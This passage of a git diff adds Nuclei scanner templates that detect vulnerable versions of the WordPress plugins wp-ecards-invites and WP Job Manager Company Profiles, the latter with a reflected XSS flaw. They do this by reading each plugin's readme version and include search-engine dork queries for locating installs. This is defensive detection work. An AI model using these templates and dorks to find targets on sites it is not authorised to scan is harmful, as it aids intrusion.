+  tags: cve,wordpress,wp-plugin,wp-ecards-invites,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-ecards-invites/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-ecards-invites"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.904')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-manager-companies.yaml b/poc/wordpress/wp-job-manager-companies.yaml
new file mode 100644
index 0000000000..6a683844b7
--- /dev/null
+++ b/poc/wordpress/wp-job-manager-companies.yaml
@@ -0,0 +1,59 @@
+id: wp-job-manager-companies
+
+info:
+  name: >
+    WP Job Manager – Company Profiles <= 1.7 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/wp-job-manager-companies/"
+    google-query: inurl:"/wp-content/plugins/wp-job-manager-companies/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,wp-job-manager-companies,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-job-manager-companies/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-job-manager-companies"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.7')
\ No newline at end of file